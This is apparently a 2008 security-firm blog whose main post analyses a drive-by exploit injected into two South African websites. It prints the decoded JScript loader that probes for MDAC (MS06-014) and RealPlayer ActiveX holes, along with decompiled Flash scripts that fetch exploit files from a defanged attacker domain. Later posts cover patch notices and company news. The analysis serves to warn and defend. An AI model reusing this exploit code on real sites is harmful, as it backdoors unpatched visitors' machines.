Q3RsLjEiKS5QbGF5ZXJQcm9wZXJ0eSgiUFJPRFVDVFZFUlNJT04iKTw9IjYuMC4xNC41NTIiKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHtkb2N1bWVudC53cml0ZSgnPGlmcmFtZSB3aWR0aD0xMCBoZWlnaHQ9MCBzcmM9cmwuaHRtPjwvaWZyYW1lPicpfQ0KICAgICAgICAgICAgICAgICAgICAgICAgIGVsc2UNCiAgICAgICAgICAgICAgICAgICAgICAgICB7DQoJCQkJCWRvY3VtZW50LndyaXRlKCc8aWZyYW1lIHdpZHRoPTEwIGhlaWdodD0wIHNyYz1uZXcuaHRtPjwvaWZyYW1lPicpfX19DQoNCgkJCQkJZG9jdW1lbnQud3JpdGUoJzxpZnJhbWUgd2lkdGg9NTAgaGVpZ2h0PTAgc3JjPTA0Lmh0bT48L2lmcmFtZT4nKQ0KDQoJCQkJaWYoaj09IltvYmplY3QgRXJyb3JdIikNCgkJCQl7bG9jYXRpb24ucmVwbGFjZSgiYWJvdXQ6YmxhbmsiKTt9DQoJCQl9fQ0KCX0NCg0Kb3BlbldNKCk7DQo8L3NjcmlwdD4="));

<./script>

<./BODY>

<./HTML>

We decoded this to the following script:

<.script>window.onerror=function(){return true;}

<.Script Language="JScript">

var cook = "silentwm";

function setCookie(name, value, expire)

{

window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));

}

function getCookie(Name)

{

var search = Name + "=";

if (window.document.cookie.length > 0)

{

offset = window.document.cookie.indexOf(search);

if (offset != -1)

{

offset += search.length;

end = window.document.cookie.indexOf(";", offset)

if (end == -1)

end = window.document.cookie.length;

return unescape(window.document.cookie.substring(offset, end));

}

}

return null;

}

function register(name)

{

var today = new Date();

var expires = new Date();

expires.setTime(today.getTime() + 1000*60*60*24);

setCookie(cook, name, expires);

}

function openWM()

{

var c = getCookie(cook);

if (c != null)

{

return;

}

register(cook);

window.defaultStatus="å®æ";

try{ var e;

var ado=(document.createElement("object"));

ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

var as=ado.createobject("Adodb.Stream","")}

catch(e){};

finally{

if(e!="[object Error]"){

document.write("")}

else

{

try{ var j;

var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}

catch(j){};

finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")

{document.write('')}

else

{

document.write('')}}}

document.write('')

if(j=="[object Error]")

{location.replace("about:blank");}

}}

}

openWM();

<./script>

Bear in mind that posting this on the blog, we changed a couple of things in the src code, but in any event, you should get the idea.

So, this is quite impressive because if your personal configuration does not give any sort of errors with the creation of the Adobe.Stream object, you will be directed to 14.htm.

From this point, the malicious binary and backdoor “bak.exe” will by downloaded to your computer via the MDAC vulnerability(if you are unpatched that is).

If any sort of errors occur a Real Player “hax” will be checked for, and this includes several different versions and vulnerabilities.

Once again, if nothing is picked up and if any errors accour, you will be taken to rl.htm and your machine will be potentially backdoored. I must stress that if it fails, it will check for several different Real Player vulnerabilities, some of which are much more recent(Including heap spraying techniques). So, thanks to websites being vulnerable, the general public now have a big issue. Anyway...

Lets take a look at 123.htm:

<.script>window.onerror=function(){return true;}

<.Script Language="JScript">

var cook = "silentwm";

function setCookie(name, value, expire)

{

window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));

}

function getCookie(Name)

{

var search = Name + "=";

if (window.document.cookie.length > 0)

{

offset = window.document.cookie.indexOf(search);

if (offset != -1)

{

offset += search.length;

end = window.document.cookie.indexOf(";", offset)

if (end == -1)

end = window.document.cookie.length;

return unescape(window.document.cookie.substring(offset, end));

}

}

return null;

}

function register(name)

{

var today = new Date();

var expires = new Date();

expires.setTime(today.getTime() + 1000*60*60*24);

setCookie(cook, name, expires);

}

function openWM()

{

var c = getCookie(cook);

if (c != null)

{

return;

}

register(cook);

window.defaultStatus="å®æ";

try{ var e;

var ado=(document.createElement("object"));

ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

var as=ado.createobject("Adodb.Stream","")}

catch(e){};

finally{

if(e!="[object Error]"){

document.write("")}

else

{

try{ var j;

var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}

catch(j){};

finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")

{document.write('')}

else

{

document.write('')}}}

document.write('')

if(j=="[object Error]")

{location.replace("about:blank");}

}}

}

openWM();

<./script>

Once again, please bear in mind that the above has been edited for the blog post.

There are actually 2 separate files that have the same content as per above, but both of them are hosting malicious swf files. In addition to this if you are using different browsers different files are loaded (i.e. 4561.swf and 4562.swf).

Decompiling the flash objects brought Flash action scripts, which load other movies:

4561.swf

var fVersion = /:$version;
loadMovie('hxxp://www.woai117.cn/' + fVersion + 'i.swf', _root);
stop();

4562.swf

var fVersion = /:$version;
loadMovie('hxxp://www.woai117.cn/' + fVersion + 'f.swf', _root);
stop();

These refer to instances of swf files which are dangerous and obviously refer to the Adobe Flash Player vulnerabilities. There are also other functions which load in the Trojan “bak.exe”which refer to RDS.Datacontrol (MS06-014) which we mentioned earlier.

Please take into account the severity of this issue, and obviously the huge impact. The general end user who visits these websites are usually not up to date with versions of Realplayer, Flash and obviously Microsoft updates.

Take into account that this was also done in very little time, just to check the possible impact by visiting those two sites. If anyone wants a copy of the above files for any sort of analysis, please do let us know and we would be more than happy to send them across.

All users that visited sabc.co.za or reportstar.net in the last little while should be aware that if they had/have vulnerable versions of Realplayer/Shockwave/Microsoft MS06-014 are probably infected and carrying a backdoor. In addition to this, all the stats are well logged for the guys to see exactly what’s going on in their little game.

Monday, June 2, 2008

Adobe Flash Attacks and more..

A security hole has recently been discovered in Macromedia Shockwave Flash allowing attackers to compromise machines that haven't applied the relevant patches. A large number of sites(even local co.za sites) have been compromised, and are still hosting the malicious content, this is affecting end users.

Please download the patch or the updated package and install from here:

http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash

It is critical that you apply this patch as soon as possible to avoid your machine being compromised.

More about this can be read on:

http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080527

In other news, it seems like www.sabc.co.za and www.reportstar.net were hit by instances of injection(No links added for obvious reasons). This was confirmed by several clients emailing us about it. The websites should still be visible on Google for confirmation.

The source code of www.sabc.co.za and www.reportstar.net both included:

http://www.dota11.cn/m.js - as of morning of 2nd June 2008.

You can read up more about it at:

http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=3409559&SiteID=1

Friday, May 30, 2008

Telspace charity success.


Firstly we would like to say thanks to everyone who wore our T-shirts at the ITweb Security summit this year, it all worked out really well thanks to all you guys. We sponsored R20 per Person that wore a T-shirts to Johnny Long's charity foundation www.hackersforcharity.org. We also decided that since the turnaround was so great, even though all 500 were not worn, we would still donate as if all 500 were, which is fantastic.

Overall it was a great success with around 350 people wearing our shirts. The Security Summit 2008 too was amazing, and featured great talks by key-note speakers and good friends of ours Roberto Preatoni, Johnny Long and Johnny Cache.

So once again thanks to everyone who helped out.

Celebrations - Good times...

Friday afternoons are always good at Telspace Systems, but specifically today! We have just received some extremely good news that caused for a bit of a celebration on our side.

Thank you to all our clients for their continuous support over the previous year, we really appreciate it and we have been working extremely hard to provide services which are unique in our market. I would like to thank our entire team for working so hard to get this point.